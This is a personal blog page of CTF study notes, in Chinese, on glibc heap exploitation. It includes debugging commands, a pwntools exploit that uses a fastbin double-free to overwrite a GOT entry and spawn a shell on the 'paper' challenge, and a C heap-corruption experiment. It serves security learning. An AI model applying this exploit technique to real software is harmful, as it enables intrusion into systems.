<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"xiaoxiaoxy1.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>
<meta name="description" content="不完善、不系统，不荐参考">
<meta property="og:type" content="article">
<meta property="og:title" content="堆">
<meta property="og:url" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/index.html">
<meta property="og:site_name" content="xiaoxiaoxy">
<meta property="og:description" content="不完善、不系统，不荐参考">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220728162036516.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718144652105.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718145936405.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718132324717.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718151556184.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718151124041.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718151809247.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMDI0MDY3,size_16,color_FFFFFF,t_70.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718135030412.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718133927099.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718193419657.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220718200732624.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220720090927920.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220720092935239.png">
<meta property="article:published_time" content="2022-07-17T12:40:03.000Z">
<meta property="article:modified_time" content="2022-08-05T03:07:10.809Z">
<meta property="article:author" content="xiaoxiaoxy">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/image-20220728162036516.png">


<link rel="canonical" href="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/","path":"2022/07/17/堆/","title":"堆"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>堆 | xiaoxiaoxy</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="xiaoxiaoxy" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">xiaoxiaoxy</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>







</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A5%BD%E7%9A%84%E5%AD%A6%E4%B9%A0%E6%96%87%E7%AB%A0"><span class="nav-number">1.</span> <span class="nav-text">好的学习文章</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86%EF%BC%882022-07-17%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">堆（2022&#x2F;07&#x2F;17）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Fastbin-Attack"><span class="nav-number">2.1.</span> <span class="nav-text">Fastbin Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#paper-%EF%BC%88double-free%EF%BC%89"><span class="nav-number">2.1.1.</span> <span class="nav-text">paper （double free）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#exp"><span class="nav-number">2.1.1.1.</span> <span class="nav-text">exp</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%96%91%E9%97%AE"><span class="nav-number">2.1.1.2.</span> <span class="nav-text">疑问</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">2.1.1.3.</span> <span class="nav-text">小结</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tcache"><span class="nav-number">2.2.</span> <span class="nav-text">tcache</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E5%85%B3%E4%BA%8E%E5%A0%86%E4%B8%8A%E6%95%B0%E6%8D%AE%E7%9A%84%E7%A0%94%E7%A9%B6-%EF%BC%882022-07-17%EF%BC%89"><span class="nav-number">3.</span> <span class="nav-text">一些关于堆上数据的研究 （2022&#x2F;07&#x2F;17）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#one%EF%BC%88%E5%A0%86%E4%B8%8A%E7%9A%84%E6%95%B0%E6%8D%AE%E6%80%8E%E4%B9%88%E5%AD%98%E7%9A%84%EF%BC%9F%EF%BC%89%EF%BC%882022-07-18%EF%BC%89"><span class="nav-number">3.1.</span> <span class="nav-text">one（堆上的数据怎么存的？）（2022&#x2F;07&#x2F;18）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#two%EF%BC%88%E7%94%B3%E8%AF%B7chunk%E5%90%8E%E5%A0%86%E4%B8%8A%E7%9A%84chunk%E5%88%86%E5%B8%83%E6%98%AF%E6%80%8E%E4%B9%88%E6%A0%B7%E7%9A%84%EF%BC%9F%EF%BC%89%EF%BC%882022-07-18%EF%BC%89"><span class="nav-number">3.2.</span> <span class="nav-text">two（申请chunk后堆上的chunk分布是怎么样的？）（2022&#x2F;07&#x2F;18）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#three%EF%BC%88%E5%AE%9E%E6%93%8D-%E7%9C%8B%E6%96%87%E7%AB%A0%E5%90%8E%E5%AF%B9alloced-chunk%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%89%EF%BC%882022-07-18%EF%BC%89"><span class="nav-number">3.3.</span> <span class="nav-text">three（实操+看文章后对alloced chunk的理解）（2022&#x2F;07&#x2F;18）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#four%EF%BC%88free-chunk%EF%BC%89%EF%BC%882022-07-18%EF%BC%89"><span class="nav-number">3.4.</span> <span class="nav-text">four（free chunk）（2022&#x2F;07&#x2F;18）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#five%EF%BC%882022-07-20%EF%BC%89"><span class="nav-number">3.5.</span> <span class="nav-text">five（2022&#x2F;07&#x2F;20）</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">xiaoxiaoxy</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://xiaoxiaoxy1.github.io/2022/07/17/%E5%A0%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="xiaoxiaoxy">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xiaoxiaoxy">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          堆
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-07-17 20:40:03" itemprop="dateCreated datePublished" datetime="2022-07-17T20:40:03+08:00">2022-07-17</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2022-08-05 11:07:10" itemprop="dateModified" datetime="2022-08-05T11:07:10+08:00">2022-08-05</time>
      </span>

  
</div>

            <div class="post-description">不完善、不系统，不荐参考</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#some of magic what is I think</span></span><br><span class="line">$ <span class="built_in">ulimit</span> -a    <span class="comment">#源自：https://blog.csdn.net/FHNCSDN/article/details/118458721</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#常用的调试指令 （写于2022/07/17）</span></span><br><span class="line">pwndbg&gt; top_chunk             <span class="comment">#打印top chunk初始地址</span></span><br><span class="line">pwndbg&gt; vmmap                 <span class="comment">#查看vmmap表</span></span><br><span class="line">pwndbg&gt; bin                   <span class="comment">#查看bin表</span></span><br><span class="line">pwndbg&gt; heap                  <span class="comment">#查看堆</span></span><br><span class="line"></span><br><span class="line">pwndbg&gt; file ./&lt;二进制文件名&gt;  <span class="comment">#导入源代码，方便调试</span></span><br><span class="line">pwndbg&gt; x/150gx 0x&lt;地址&gt;      <span class="comment">#打印堆信息  x/150gx 0x555555559000</span></span><br><span class="line"></span><br><span class="line">      $ gdb &lt;二进制文件&gt;</span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> environment LD_PRELOAD ./&lt;libc文件&gt;   <span class="comment"># set environment LD_PRELOAD ./libc-2.23.so</span></span><br><span class="line">pwndbg&gt; starti</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#命令行指令</span></span><br><span class="line">$ gdb --args env LD_PRELOAD=./x64/2.23/libc-2.23.so ./x64/2.23/ld-2.23.so ./note</span><br><span class="line"><span class="comment"># gdb --args env LD_PRELOAD=./x64/2.23/libc-2.23.so ./x64/2.23/ld-2.23.so ./hacknote</span></span><br><span class="line"></span><br><span class="line">$ LD_PRELOAD=./my.so ./my_program        <span class="comment">#https://zgserver.com/ld_preloadgdb.html</span></span><br><span class="line">$ gdb your_program (gdb) <span class="built_in">set</span> environment LD_PRELOAD=./yourso.so (gdb) start</span><br><span class="line">$ LD_PRELOAD=./my.so gdb ./my.program </span><br><span class="line"></span><br><span class="line">&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;</span><br></pre></td></tr></table></figure>

<br/>

<br/>

<h2 id="好的学习文章"><a href="#好的学习文章" class="headerlink" title="好的学习文章"></a>好的学习文章</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;链接：<a target="_blank" rel="noopener" href="https://introspelliam.github.io/2017/09/10/pwn/Linux%E5%A0%86%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90%E4%B8%8A/">Linux堆内存管理深入分析上 | Introspelliam</a></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;链接：<a target="_blank" rel="noopener" href="https://introspelliam.github.io/2017/09/15/pwn/Linux%E5%A0%86%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90%E4%B8%8B/">Linux堆内存管理深入分析下 | Introspelliam</a></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;链接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/unr4v31/p/14446412.html">Glibc堆管理机制基础 - unr4v31 - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="http://brieflyx.me/2015/python-module/pwntools-intro/">Exploit利器——Pwntools - BrieflyX’s Base</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45556441/article/details/115721445">关于addr=u32(r.recvuntil(‘\xf7‘)-4:])的解释_半岛铁盒@的博客-CSDN博客_recvuntil函数</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/chrysanthemum/p/11772977.html">攻防世界 | string - laolao - 博客园 (cnblogs.com)</a></p>
<h2 id="堆（2022-07-17）"><a href="#堆（2022-07-17）" class="headerlink" title="堆（2022/07/17）"></a>堆（2022/07/17）</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1、关于栈、堆、堆栈这三个东西，普遍认为堆栈只是栈的不同叫法，但有些地方会混淆堆栈的说法把堆说成堆栈，具体指什么还得自己在所处语境去自行分辨。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2、对于 “ 物理相邻的前一个chunk ” ，以chunk的prev_size为chunk前部，那么 “物理相邻的前一chunk” 是指相邻的第一个低地址chunk </p>
<h3 id="Fastbin-Attack"><a href="#Fastbin-Attack" class="headerlink" title="Fastbin Attack"></a>Fastbin Attack</h3><h4 id="paper-（double-free）"><a href="#paper-（double-free）" class="headerlink" title="paper （double free）"></a>paper （double free）</h4><p><a target="_blank" rel="noopener" href="https://xuanxuanblingbling.github.io/assets/pwn/paper">题目链接</a></p>
<p>[Ubuntu16.04安装教程](<a href="https://xiaoxiaoxy1.github.io/2022/03/26/ubuntu20-04%E5%AE%89%E8%A3%85/#Ubuntu-16-04%E5%AE%89%E8%A3%85">ubuntu20.04 &amp; ubuntu16.04安装 | xiaoxiaoxy (xiaoxiaoxy1.github.io)</a>)</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">解题步骤：(实验环境：Ubuntu16.04)</span><br><span class="line">1、找漏洞点</span><br><span class="line">    IDA 反编译 paper 文件  <span class="comment">#存在后门函数</span></span><br><span class="line">    got表可写    <span class="comment">#ida shift+F7查看.got.plt位置，gdb中vmmap查看该段读写权限</span></span><br><span class="line">    存在Double free的情况，可以进行任意地址写</span><br><span class="line">    fastbin Attack 中的 Double free <span class="comment">#本题类型</span></span><br><span class="line">2、利用分析</span><br><span class="line">    利用double free重写got表地址，将后门函数地址覆盖got表中的特定函数</span><br><span class="line">    执行被覆写函数，就会跳到后门函数拿到shell</span><br></pre></td></tr></table></figure>

<h5 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(arch = <span class="string">&quot;amd64&quot;</span>,os = <span class="string">&quot;linux&quot;</span>,log_level = <span class="string">&quot;debug&quot;</span>)</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./paper&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,<span class="built_in">len</span>,content</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;2 delete paper&quot;</span>,<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Input the index you want to store(0-9):&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;How long you will enter:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;please enter your content:&quot;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">index</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;2 delete paper&quot;</span>,<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;index(0-9):&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(io)  #调试时去注释</span></span><br><span class="line"><span class="comment"># sleep(1)</span></span><br><span class="line"></span><br><span class="line">addr = <span class="number">0x60202a</span>   <span class="comment">#构造出的chunk的chunk头起始地址</span></span><br><span class="line">addr1= <span class="number">0x400943</span>   <span class="comment">#后门函数地址</span></span><br><span class="line"></span><br><span class="line">size = <span class="number">0x30</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,size,<span class="string">&quot;1313&quot;</span>)  </span><br><span class="line">add(<span class="number">1</span>,size,<span class="string">&quot;1545&quot;</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">0</span>)         <span class="comment">#两次申请chunk，三次freechunk，做到Doublefree</span></span><br><span class="line">add(<span class="number">2</span>,size,p64(addr))  <span class="comment">#fd指针修改为got表上指定地址</span></span><br><span class="line">add(<span class="number">3</span>,size,<span class="string">&quot;1312&quot;</span>)</span><br><span class="line">add(<span class="number">4</span>,size,<span class="string">&quot;1543&quot;</span>)</span><br><span class="line"><span class="comment">#padding = b&quot;\xa7\xf7\xff\x7f\x00\x00&quot;+p64(addr1)</span></span><br><span class="line">padding = <span class="string">b&quot;\x40\x00\x00\x00\x00\x00&quot;</span>+p64(addr1)</span><br><span class="line">add(<span class="number">5</span>,size,padding)    <span class="comment">#got表上伪造chunk，覆写正常函数为后门函数</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;2 delete paper&quot;</span>,<span class="built_in">str</span>(<span class="number">1</span>))  <span class="comment">#调用被覆写函数，执行后门函数</span></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h5 id="疑问"><a href="#疑问" class="headerlink" title="疑问"></a>疑问</h5><p><img src="image-20220728162036516.png" alt="image-20220728162036516"></p>
<p>构造的chunk大小服从于最终地址处适用的chunk大小，能否不服从于最终地址处适用chunk大小来构造chunk</p>
<h5 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h5><p>通过 fastbin double free 我们可以使用多个指针控制同一个堆块，这可以用于篡改一些堆块中的关键数据域或者是实现类似于类型混淆的效果。 如果更进一步修改 fd 指针，则能够实现任意地址分配堆块的效果 **(首先要通过验证)**，这就相当于任意地址写任意值的效果。</p>
<p>Arena：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41453285/article/details/96846067">什么是堆漏洞挖掘？堆的glibc实现、Arena（main_arena、thread_arena）_董哥的黑板报的博客-CSDN博客</a></p>
<p>fastbin attack：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/fastbin-attack/#fastbin-attack">Fastbin Attack - CTF Wiki (ctf-wiki.org)</a></p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blingblingxuanxuan.github.io/2020/02/23/paper/">ctf堆入门 - paper | blingbling’s blog (blingblingxuanxuan.github.io)</a></p>
<br/>

<h3 id="tcache"><a href="#tcache" class="headerlink" title="tcache"></a>tcache</h3><p>链接：<a target="_blank" rel="noopener" href="https://firmianay.gitbooks.io/ctf-all-in-one/content/doc/4.14_glibc_tcache.html">https://firmianay.gitbooks.io/ctf-all-in-one/content/doc/4.14_glibc_tcache.html</a></p>
<br/>

<br/>

<h2 id="一些关于堆上数据的研究-（2022-07-17）"><a href="#一些关于堆上数据的研究-（2022-07-17）" class="headerlink" title="一些关于堆上数据的研究 （2022/07/17）"></a>一些关于堆上数据的研究 （2022/07/17）</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>注：忘了堆上的数据怎么存的、指针怎么指的的话就回头看两眼</strong></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;接下来的操作都是在Ubuntu20.04版本下调试出来的</p>
<br/>

<h3 id="one（堆上的数据怎么存的？）（2022-07-18）"><a href="#one（堆上的数据怎么存的？）（2022-07-18）" class="headerlink" title="one（堆上的数据怎么存的？）（2022/07/18）"></a>one（堆上的数据怎么存的？）（2022/07/18）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">//源C代码  cs1d.c</span><br><span class="line">//编译指令：gcc -g cs1d.c -o cs1d  代码是修改别人的代码得来的</span><br><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    void *hollk, *hollk1;</span><br><span class="line">    hollk = malloc(0x10);                             //-2 分配第一个0x10的chunk</span><br><span class="line">    malloc(0x10);                                     //-1 分配第二个0x10的chunk   </span><br><span class="line">    *(long long *)((long long)hollk - 0x8) = 0x41;    //0  修改第一个块的size域</span><br><span class="line">    </span><br><span class="line">    *(long long *)((long long)hollk - 0x1) = 0x12;    //1  对应下图中的 1</span><br><span class="line">    *(long long *)((long long)hollk - 0x2) = 0x4321;  //2  对应下图中的 2</span><br><span class="line">    *(long long *)((long long)hollk - 0x3) = 0x23;    //3  对应下图中的 3</span><br><span class="line">    *(long long *)((long long)hollk - 0x4) = 0x5432;  //4  对应下图中的 4</span><br><span class="line">    *(long long *)((long long)hollk - 0xa) = 0x34;    //5  对应下图中的 5</span><br><span class="line">    *(long long *)((long long)hollk - 0xb) = 0x6543;  //6  对应下图中的 6</span><br><span class="line">    *(long long *)((long long)hollk - 0xc) = 0x45;    //7  ......</span><br><span class="line">    *(long long *)((long long)hollk - 0xd) = 0x7654;  //8</span><br><span class="line">    *(long long *)((long long)hollk - 0x10) = 0x11;   //9</span><br><span class="line">    *(long long *)((long long)hollk - 0x11) = 0x22;   //10</span><br><span class="line">    *(long long *)((long long)hollk - 0x12) = 0x3333; //11</span><br><span class="line">    *(long long *)((long long)hollk - 0x1a) = 0x44;   //12</span><br><span class="line">    *(long long *)((long long)hollk - 0x1b) = 0x5555; //13</span><br><span class="line">    *(long long *)((long long)hollk - 0x0) = 0x99;    //14</span><br><span class="line">    *(long long *)((long long)hollk + 0x1) = 0x8888;  //15</span><br><span class="line">    *(long long *)((long long)hollk + 0x2) = 0x77;    //16</span><br><span class="line">    *(long long *)((long long)hollk + 0x3) = 0x666;   //17</span><br><span class="line">    *(long long *)((long long)hollk + 0x4) = 0x555555;//18</span><br><span class="line">    *(long long *)((long long)hollk + 0xa) = 0x44;    //19</span><br><span class="line">    *(long long *)((long long)hollk + 0xb) = 0x33;    //20</span><br><span class="line">    *(long long *)((long long)hollk + 0xc) = 0x2222;  //21</span><br><span class="line">    *(long long *)((long long)hollk + 0xd) = 0x111111;//22</span><br><span class="line">    </span><br><span class="line">    //注：0x10 = 16</span><br><span class="line">    </span><br><span class="line">    free(hollk);</span><br><span class="line">    hollk1 = malloc(0x30);// 实现extend，控制了第二个块的内容</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//参考链接：https://blog.csdn.net/qq_41202237/article/details/108320408</span><br><span class="line">//以上链接估计是参考ctf wiki上的堆知识，不过比ctf wiki上的堆讲解看起来好懂很多</span><br></pre></td></tr></table></figure>

<p><img src="image-20220718144652105.png" alt="image-20220718144652105"></p>
<p><img src="image-20220718145936405.png" alt="image-20220718145936405"></p>
<p><strong>小结：经过对指针附近数据的变化可以看出，我们指向chunk的指针是指在User_data这一段起始的地方，而不是chunk头的Prev_size处</strong></p>
<br/>

